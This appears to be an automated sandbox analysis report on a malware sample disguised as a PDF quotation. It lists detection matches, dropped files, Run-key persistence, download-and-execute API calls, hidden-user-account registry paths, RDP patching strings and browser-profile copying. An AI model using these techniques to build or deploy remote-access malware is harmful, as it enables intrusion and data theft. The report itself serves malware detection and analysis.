00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5410000.17.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3d8b9cb.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3c71e38.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3cd9fc2.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3d8b9cb.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.52c0000.24.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3cb9fa2.16.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3cd9fc2.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3dcb898.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.52c0000.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3d19e98.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5410000.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3dcb898.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3d6b9ab.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.donexx.exe.3d19e98.15.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3d1da38.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000024.00000002.472719163.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000026.00000002.472797955.000000000287C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000026.00000002.473331957.00000000038D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.408610902.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000026.00000002.472797955.0000000002884000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.408610902.0000000002CE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.408610902.0000000002CE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.310866427.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000026.00000002.472797955.0000000002864000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.311069097.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.473185909.0000000003A42000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.472719163.000000000293A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.310866427.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.472719163.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.311069097.0000000003D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.310866427.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.408924727.0000000003C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.310866427.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.472719163.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000026.00000002.472797955.0000000002867000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.408610902.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000026.00000002.472797955.000000000260A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.311307697.0000000005410000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.409456316.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.472719163.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.408610902.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe PID: 6840, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: donexx.exe PID: 6436, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Fhzejfh.exe PID: 5712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Fhzejfh.exe PID: 5620, type: MEMORYSTR
                  .NET source code contains potential unpacker
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, -.cs.Net Code: _E002 System.Reflection.Assembly.Load(byte[])
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5450000.18.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5450000.18.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5450000.18.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5450000.18.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5450000.18.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b29550.11.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b29550.11.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b29550.11.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b29550.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b29550.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.53b0000.16.raw.unpack, --.cs.Net Code: _0003 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.53b0000.16.raw.unpack, --.cs.Net Code: _0003 System.AppDomain.Load(byte[])
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.53b0000.16.raw.unpack, --.cs.Net Code: _0003 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b79570.9.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b79570.9.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b79570.9.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b79570.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b79570.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_0AB0BAA8 pushfd ; iretd 24_2_0AB0BAA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_004011C0 push eax; ret 33_2_004011D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_004011C0 push eax; ret 33_2_004011FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0041C225 pushad ; retn 0041h33_2_0041C22D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_004174D1 push ebp; retf 33_2_00417584
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00417570 push ebp; retf 33_2_00417584
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,33_2_004060B0
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.941086335962951

                  Persistence and Installation Behavior

                  barindex
                  Uses ipconfig to lookup or modify the Windows network settings
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040D2B8 NetUserAdd,NetLocalGroupAddMembers,33_2_0040D2B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\Temp\donexx.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeFile created: C:\Users\user\AppData\Roaming\Fhzejfh.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040290E URLDownloadToFileW,ShellExecuteW,33_2_0040290E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,33_2_0040A36F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,33_2_00409E2D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,33_2_00413695
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FhzejfhJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FhzejfhJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040D3A8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,33_2_0040D3A8

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\Desktop\:Zone.Identifier read attributes | deleteJump to behavior
                  Contains functionality to hide user accounts
                  Source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
                  Source: donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
                  Source: aspnet_compiler.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
